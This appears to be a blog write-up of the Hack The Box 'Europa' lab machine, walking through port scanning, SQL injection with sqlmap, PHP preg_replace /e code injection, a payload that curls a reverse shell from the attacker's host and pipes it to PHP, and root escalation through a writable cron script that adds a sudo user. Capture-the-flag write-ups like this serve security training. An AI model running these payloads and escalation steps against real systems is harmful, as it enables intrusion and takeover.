5 December 2022

Pentesting Fun Stuff

following the cyber security path…

Europa

Starting with a port scan.

root@n0w4n:~# nmap -vv -n -T4 -A -sC -p- 10.10.10.22
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-06 10:35 CEST
Nmap scan report for 10.10.10.22
Host is up, received reset ttl 63 (0.025s latency).
Scanned at 2018-07-06 10:35:34 CEST for 246s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT    STATE SERVICE  REASON         VERSION
22/tcp  open  ssh      syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCh1/OK73CDKnJigk6uMUzDLSQhCHSpt9xL+SJrizWdCa7edGviU3NU/8So5xOOgzV1k8u3qHsudNnTSiH8Ek9d2c48B3xYHZn5+nPDv22fZ82LIRKd5qSLhthk91bL3uV+/CURpOZshvo0bVPS48UQaw5r7pWTE0goB+qyG2csY7hr3+9C7Sx4L/Vx7MOFuGAoy/EnpHG10f12ZJ6IVrX8mMEyZGb3Bh7crRN8tQ2RAvnJxyj+1ZeDo7Vr2F75r//dEL2iQ4S2Iuz8BocjQMREyIguIOSOJxjc/L52TpioRHnNK/aEArT02uakB4jRyd5LTSsijjitgUlAk/3H2cYd
|   256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEqrLpdz7aDIUDy3bslqFlbGCrL4Q6tQmesbTP73F/Rv0GO6bb3zHETnZwVB5AKes/pQdRrbDlQCtR2v2WsTXsw=
|   256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDE2hVC32u7eNINSvsmSQkbMlUkJ7s0oiG/bxPhwZb/b
80/tcp  open  http     syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open  ssl/http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR/localityName=Athens/emailAddress=admin@europacorp.htb/organizationalUnitName=IT
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Issuer: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR/localityName=Athens/emailAddress=admin@europacorp.htb/organizationalUnitName=IT
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-04-19T09:06:22
| Not valid after:  2027-04-17T09:06:22
| MD5:   35d5 1c04 7ae8 0f5c 35a0 bc49 53e5 d085
| SHA-1: ced9 8f01 1228 e35d 83d3 2634 b4c1 ed52 b917 3335
| -----BEGIN CERTIFICATE-----
| MIIFSDCCA7CgAwIBAgIJAPGhMP4FtiTCMA0GCSqGSIb3DQEBCwUAMIGUMQswCQYD
| VQQGEwJHUjEPMA0GA1UECAwGQXR0aWNhMQ8wDQYDVQQHDAZBdGhlbnMxGDAWBgNV
| BAoMD0V1cm9wYUNvcnAgTHRkLjELMAkGA1UECwwCSVQxFzAVBgNVBAMMDmV1cm9w
| YWNvcnAuaHRiMSMwIQYJKoZIhvcNAQkBFhRhZG1pbkBldXJvcGFjb3JwLmh0YjAe
| Fw0xNzA0MTkwOTA2MjJaFw0yNzA0MTcwOTA2MjJaMIGUMQswCQYDVQQGEwJHUjEP
| MA0GA1UECAwGQXR0aWNhMQ8wDQYDVQQHDAZBdGhlbnMxGDAWBgNVBAoMD0V1cm9w
| YUNvcnAgTHRkLjELMAkGA1UECwwCSVQxFzAVBgNVBAMMDmV1cm9wYWNvcnAuaHRi
| MSMwIQYJKoZIhvcNAQkBFhRhZG1pbkBldXJvcGFjb3JwLmh0YjCCAaIwDQYJKoZI
| hvcNAQEBBQADggGPADCCAYoCggGBAKzVzRrrM1MSWnf8zniIPKt0SXGDB2msYUm3
| rQJ3j31wPfn9xJOWeIpBCIbtXkRqO3XGrLjG/M0Slp3sa/lQ+1dk8aupaudrJvCm
| ITzLnGvtzrtyDlPkozH2wqM+tJx351gKhfrdF81TItS8oe3yskPW3MvEDbi5lPQM
| OVZk4dhFT4l94E1zrRoapU9fqNL66BdEzeEdS6XwntdARBrEyEoCp7nFIGMBKSIn
| JzxIh2VS98ybxkw58QcDEG9ClDH49nglkKmQfAevGKil8f1f9NYRwW3YOCvuzAA7
| Osg+pLEp4de6MEf408+AOhxl4CvgZKYWvmu7b+OSrFDN8cHFy/bQ2fvrjXNazjA0
| 9FIj4wivJ7JgJOCdXEianNZkvLzqPXGS/dVUrFF5fzyG0z5xOTvABZp86fNa3yNu
| zLb04h3j04SvfJ+T3CzkZDWVsFvOYdKsce600S/iaUoqE7XQH6QPB54ba5ailVtH
| npmV1uVqVxT7tXAs0ztIDpqzJ0XAnwIDAQABo4GaMIGXMB0GA1UdDgQWBBSdw09g
| /iRsaKt8R137PRpTAfuTgTA6BgNVHREEMzAxghJ3d3cuZXVyb3BhY29ycC5odGKC
| G2FkbWluLXBvcnRhbC5ldXJvcGFjb3JwLmh0YjAfBgNVHSMEGDAWgBSdw09g/iRs
| aKt8R137PRpTAfuTgTAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIFoDANBgkqhkiG
| 9w0BAQsFAAOCAYEAbv2ccFD/d2ovr3dkIqL1m2Qo3AgMObUaBczB37KDsB0w6lzf
| EOM/aBVth8LarblnVUJE0tk8Io7VBcTP9hF2nt3BuSM0mF6yMY3WRY+23JJpNxSO
| nOrZ1xLB7a6XTwSTWD0kg2bRbjSbiEWaUzY/RrqtCF1NThgyXo0wuMWPpPICmbd/
| 5ID8iOH+rmR3nR4fP80J38SUmvrsXAmifbsbKaKHspNMclQ2Idfiyv53xAoFrJzV
| cuxHKyBxYn8A5DPRIhbesLF2NAy0d4aziNeVgGQnSA9cV9RhN454nuzwqKb33BlF
| L8cpG59w3xR8RuyTyZql4uBPZtogzh0pc0PyxX2E2O5nbn85aqYDkVW7aUkeiU69
| LAiIp8s6Z+Rhe2rN4RAudtMcWaMTwjBOb1k1UrJ+0T7Av3O5nJk5kd/Ee5LUD2jX
| wE9Q72WLg1HP/PSSJPsNASSAW4OWSYG1CqLIhfRk5wJtfi6oR9VO+CpajWvqB0Ej
| PTXIrDgdEK1VKan9
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|   http/1.1
|_  http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.70%E=4%D=7/6%OT=22%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=5B3F2ACC%P=x86_64-pc-linux-gnu)
SEQ(SP=106%GCD=1%ISR=10A%TI=Z%II=I%TS=8)
OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=Y%DF=Y%TG=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 1.581 days (since Wed Jul  4 20:42:20 2018)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   24.76 ms 10.10.14.1
2   24.83 ms 10.10.10.22
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 10:39
Completed NSE at 10:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 10:39
Completed NSE at 10:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 246.88 seconds
           Raw packets sent: 131237 (5.778MB) | Rcvd: 188 (13.883KB)

So there is a SSH server running and a webserver on port 80 and 443. There is a certificate available and when looking at that certificate I noticed DNS information.
Because there is only one IP address, but 2 hostnames it looks like there is some virtual host routing (explanation).
Grabbing the HTTP header with Burp.

GET / HTTP/1.1
Host: 10.10.10.22
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 26 Jul 2017 22:36:04 GMT
If-None-Match: "30a7-5554012ba5aba-gzip"
Cache-Control: max-age=0

And changing the host.

GET / HTTP/1.1
Host: admin-portal.europacorp.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 26 Jul 2017 22:36:04 GMT
If-None-Match: "30a7-5554012ba5aba-gzip"
Cache-Control: max-age=0

And as a response I get a redirect to a login page.

HTTP/1.1 302 Found
Date: Fri, 06 Jul 2018 10:11:20 GMT
Server: Apache/2.4.18 (Ubuntu)
Location: https://admin-portal.europacorp.htb/login.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

When I follow the redirect burp doesn’t know where to go and that’s because of the hostname which it doesn’t know. Altering the /etc/hosts file will change that.

10.10.10.22	admin-portal.europacorp.htb

Now I can access the admin portal.

When checking the source page there is a CSS file which tells me that the framework used is a CMS called Bootstrap.
Let’s try to log in……..nope.
I capture the HTTP header with burp and feed it to sqlmap. Sqlmap tries to go to port 80 and doesn’t find the URL. So I add ‘:443’ to the host in the header file. Another possibile optinos is use the –forse-ssl flag in sqlmap.

root@n0w4n:~/opt/htb/europa# sqlmap -r header.txt --risk=3 --level=5 --dbs

After a while I get some result.

Database: admin
Table: users
[2 entries]
+----+----------------------+--------+---------------+----------------------------------+
| id | email                | active | username      | password                         |
+----+----------------------+--------+---------------+----------------------------------+
| 1  | admin@europacorp.htb | 1      | administrator | 2b6d315337f18617ba18922c0b9597ff |
| 2  | john@europacorp.htb  | 1      | john          | 2b6d315337f18617ba18922c0b9597ff |
+----+----------------------+--------+---------------+----------------------------------+

After a quick search on some MD5 crackers online I get the result.

2b6d315337f18617ba18922c0b9597ff MD5 : SuperSecretPassword!


Almost everything is inactive, except for the ‘Tools’ section.
Within the Tools section there is an OpenVPN Config Generator with an input field.

"openvpn": {
        "vtun0": {
                "local-address": {
                        "10.10.10.1": "''"
                },
                "local-port": "1337",
                "mode": "site-to-site",
                "openvpn-option": [
                        "--comp-lzo",
                        "--float",
                        "--ping 10",
                        "--ping-restart 20",
                        "--ping-timer-rem",
                        "--persist-tun",
                        "--persist-key",
                        "--user nobody",
                        "--group nogroup"
                ],
                "remote-address": "ip_address",
                "remote-port": "1337",
                "shared-secret-key-file": "/config/auth/secret"
        },
        "protocols": {
                "static": {
                        "interface-route": {
                                "ip_address/24": {
                                        "next-hop-interface": {
                                                "vtun0": "''"
                                        }
                                }
                        }
                }
        }
}

What does it do?

"openvpn": {
"vtun0": {
"local-address": {
"10.10.10.1": "''"
},
"local-port": "1337",
"mode": "site-to-site",
"openvpn-option": [
"--comp-lzo",
"--float",
"--ping 10",
"--ping-restart 20",
"--ping-timer-rem",
"--persist-tun",
"--persist-key",
"--user nobody",
"--group nogroup"
],
"remote-address": "10.10.14.3",
"remote-port": "1337",
"shared-secret-key-file": "/config/auth/secret"
},
"protocols": {
"static": {
"interface-route": {
"10.10.14.3/24": {
"next-hop-interface": {
"vtun0": "''"
}
}
}
}
}
}

It replaces ‘ip_address’ with my given value (in this case 10.10.14.3). Can I misuse this? Let’s run it through Burp again.

POST /tools.php HTTP/1.1
Host: admin-portal.europacorp.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://admin-portal.europacorp.htb/tools.php
Cookie: PHPSESSID=53pne4hhcormh5obflmmonjvb4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1688
pattern=%2Fip_address%2F&ipaddress=10.10.14.3&text=%22openvpn%22%3A+%7B%0D%0A++++++++%22vtun0%22%3A+%7B%0D%0A++++++++++++++++%22local-address%22%3A+%7B%0D%0A++++++++++++++++++++++++%2210.10.10.1%22%3A+%22%27%27%22%0D%0A++++++++++++++++%7D%2C%0D%0A++++++++++++++++%22local-port%22%3A+%221337%22%2C%0D%0A++++++++++++++++%22mode%22%3A+%22site-to-site%22%2C%0D%0A++++++++++++++++%22openvpn-option%22%3A+%5B%0D%0A++++++++++++++++++++++++%22--comp-lzo%22%2C%0D%0A++++++++++++++++++++++++%22--float%22%2C%0D%0A++++++++++++++++++++++++%22--ping+10%22%2C%0D%0A++++++++++++++++++++++++%22--ping-restart+20%22%2C%0D%0A++++++++++++++++++++++++%22--ping-timer-rem%22%2C%0D%0A++++++++++++++++++++++++%22--persist-tun%22%2C%0D%0A++++++++++++++++++++++++%22--persist-key%22%2C%0D%0A++++++++++++++++++++++++%22--user+nobody%22%2C%0D%0A++++++++++++++++++++++++%22--group+nogroup%22%0D%0A++++++++++++++++%5D%2C%0D%0A++++++++++++++++%22remote-address%22%3A+%22ip_address%22%2C%0D%0A++++++++++++++++%22remote-port%22%3A+%221337%22%2C%0D%0A++++++++++++++++%22shared-secret-key-file%22%3A+%22%2Fconfig%2Fauth%2Fsecret%22%0D%0A++++++++%7D%2C%0D%0A++++++++%22protocols%22%3A+%7B%0D%0A++++++++++++++++%22static%22%3A+%7B%0D%0A++++++++++++++++++++++++%22interface-route%22%3A+%7B%0D%0A++++++++++++++++++++++++++++++++%22ip_address%2F24%22%3A+%7B%0D%0A++++++++++++++++++++++++++++++++++++++++%22next-hop-interface%22%3A+%7B%0D%0A++++++++++++++++++++++++++++++++++++++++++++++++%22vtun0%22%3A+%22%27%27%22%0D%0A++++++++++++++++++++++++++++++++++++++++%7D%0D%0A++++++++++++++++++++++++++++++++%7D%0D%0A++++++++++++++++++++++++%7D%0D%0A++++++++++++++++%7D%0D%0A++++++++%7D%0D%0A%7D%0D%0A++++++++++++++++++++++++++++++++

Mostly URL encoded. Decoding in Burp is easy.

pattern=/ip_address/&ipaddress=10.10.14.3&text="openvpn": {
        "vtun0": {
                "local-address": {
                        "10.10.10.1": "''"
                },
                "local-port": "1337",
                "mode": "site-to-site",
                "openvpn-option": [
                        "--comp-lzo",
                        "--float",
                        "--ping 10",
                        "--ping-restart 20",
                        "--ping-timer-rem",
                        "--persist-tun",
                        "--persist-key",
                        "--user nobody",
                        "--group nogroup"
                ],
                "remote-address": "ip_address",
                "remote-port": "1337",
                "shared-secret-key-file": "/config/auth/secret"
        },
        "protocols": {
                "static": {
                        "interface-route": {
                                "ip_address/24": {
                                        "next-hop-interface": {
                                                "vtun0": "''"
                                        }
                                }
                        }
                }
        }
}

So the php function replaces a value with another value that was given by the user. When searching Google I found this was the preg_replace function (link).
It looks like this function searches the subject for pattern matching and replaces them with given replacement. With this PCRE there are a bunch of modifiers available and one of them stands out from the rest. It looks like the /e modifier is deprecated because of some security issues (link). The preferred function nowadays should be preg_replace_callback().
But why is this modifier so bad? On this site there is an excellent explanation why using preg_replace is such a bad idea. In a nutshell if this modifier is set, preg_replace() does normal substitution of backreferences in the replacement string, evaluates it as PHP code, and uses the result for replacing the search string. Single quotes, double quotes, backslashes (\) and NULL chars will be escaped by backslashes in substituted backreferences. As /e evaluates arbitrary PHP code it can easily be exploited if user input is not carefully validated or sanitized.
Let’s see if commands will be executed.

Looks like the commands are executed just nicely.
Now let’s get a shell. For this I use one of my favorites: pentestmonkey. The script is altered to point back to my ip + port.
Setting up listener.

root@n0w4n:~/opt/htb/europa# nc -lvnp 31337
listening on [any] 31337 ...

Entering in same repeater window of Burp.

pattern=/ip_address/e&ipaddress=system('curl http://10.10.14.3:8000/shell.php | php;')&text="openvpn": {

Response on my machine.

root@n0w4n:~/opt/htb/europa# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.22 - - [06/Jul/2018 14:50:26] "GET /shell.php HTTP/1.1" 200 -

And I have a working shell.

root@n0w4n:~/opt/htb/europa# nc -lvnp 31337
listening on [any] 31337 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.22] 41852
Linux europa 4.4.0-81-generic #104-Ubuntu SMP Wed Jun 14 08:17:06 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 15:53:06 up 7 min,  0 users,  load average: 0.00, 0.06, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Because this is a temporary shell I wanted to upload a more permanent one which I could execute from the /var/www/admin folder, but it was write restricted.
After exiting the /admin/ folder I noticed a /var/www/cmd and /var/www/cronjobs folder. The /cmd was empty but inside the /cronjobs folder there was a file named clearlogs

#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>

For the enumeration part I uploaded the LinEnum script and run it from /tmp.

[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
...
[-] Contents of /etc/passwd:
john:x:1000:1000:John Makris,,,:/home/john:/bin/bash
...
[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K Apr 18 2017 .
drwxr-xr-x 23 root root 4.0K Jun 23 2017 ..
drwxr-xr-x 4 john john 4.0K Jun 23 2017 john
[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
/usr/bin/screen
[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * *	root	/var/www/cronjobs/clearlogs

Here is the cronjob from earlier. Looks like it runs every minute.
From earlier in the LinEnum output it looked like the /home/john folder is open for anyone….so let’s have a look for a flag.

$ cd /home/john
$ ls -lah
total 40K
drwxr-xr-x 4 john john 4.0K Jun 23  2017 .
drwxr-xr-x 3 root root 4.0K Apr 18  2017 ..
-rw------- 1 john john    1 Dec 24  2017 .bash_history
-rw-r--r-- 1 john john  220 Apr 18  2017 .bash_logout
-rw-r--r-- 1 john john 3.7K Apr 18  2017 .bashrc
drwx------ 2 john john 4.0K Apr 18  2017 .cache
drwxrwxr-x 2 john john 4.0K Apr 18  2017 .nano
-rw-r--r-- 1 john john  655 Apr 18  2017 .profile
-rw------- 1 root root 1.0K Apr 19  2017 .rnd
-rw-r--r-- 1 john john    0 Apr 18  2017 .sudo_as_admin_successful
-r--r--r-- 1 root john   33 Jun 23  2017 user.txt
$ cat user.txt
2f8d40cc05295154a9c3452c19ddc221

Now for the elevated rights and the final flag.

$ cd /var/www/cmd
$ ls -lah
total 8.0K
drwxrwxr-x 2 root www-data 4.0K May 12  2017 .
drwxr-xr-x 6 root root     4.0K May 12  2017 ..
$ echo -ne "#!/bin/bash\ntouch /tmp/test.txt" > logcleared.sh
$ ls -lah
total 12K
drwxrwxr-x 2 root     www-data 4.0K Jul  6 16:58 .
drwxr-xr-x 6 root     root     4.0K May 12  2017 ..
-rw-rw-rw- 1 www-data www-data   36 Jul  6 16:58 logcleared.sh
$ chmod +x logcleared.sh
$ ls -lah /tmp
total 36K
drwxrwxrwt 9 root root 4.0K Jul 6 16:59 .
drwxr-xr-x 23 root root 4.0K Jun 23 2017 ..
drwxrwxrwt 2 root root 4.0K Jul 6 16:52 .ICE-unix
drwxrwxrwt 2 root root 4.0K Jul 6 16:52 .Test-unix
drwxrwxrwt 2 root root 4.0K Jul 6 16:52 .X11-unix
drwxrwxrwt 2 root root 4.0K Jul 6 16:52 .XIM-unix
drwxrwxrwt 2 root root 4.0K Jul 6 16:52 .font-unix
drwx------ 3 root root 4.0K Jul 6 16:52 systemd-private-b62d0155be1d4db89f375b92afe80b91-systemd-timesyncd.service-LsnZ9N
-rw-r--r-- 1 root root 0 Jul 6 16:59 test.txt
drwx------ 2 root root 4.0K Jul 6 16:52 vmware-root

Looks like that worked. Now for some better content.

$ echo -ne "\nuseradd -m n0w4n" >> logcleared.sh
$ echo "echo 'n0w4n:password1' | chpasswd" >> logcleared.sh
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
john:x:1000:1000:John Makris,,,:/home/john:/bin/bash
n0w4n:x:1001:1001::/home/n0w4n:
$ echo "usermod -aG sudo n0w4n" >> logcleared.sh

That went well.

root@n0w4n:~/opt/htb/europa# ssh n0w4n@10.10.10.22
n0w4n@10.10.10.22's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-81-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Fri Jul  6 17:09:50 2018 from 10.10.14.3
$ id
uid=1001(n0w4n) gid=1001(n0w4n) groups=1001(n0w4n),27(sudo)
$ sudo -i
[sudo] password for n0w4n:
root@europa:~# cd /root
root@europa:~# ls -lah
total 32K
drwx------  4 root root 4.0K Jun 23  2017 .
drwxr-xr-x 23 root root 4.0K Jun 23  2017 ..
-rw-------  1 root root    1 Dec 24  2017 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
drwx------  2 root root 4.0K May 12  2017 .cache
drwxr-xr-x  2 root root 4.0K Apr 19  2017 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-r--------  1 root root   33 Jun 23  2017 root.txt
root@europa:~# cat root.txt
7f19438b27578e4fcc8bef3a029af5a5

And done.
 
An easier and quicker way to get the flag was to change the password of root and ssh in as root or even just cat the /root/root.txt into a readable file.
But hey…..there are always other ways to get things done.
 
 
 
 
 
 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.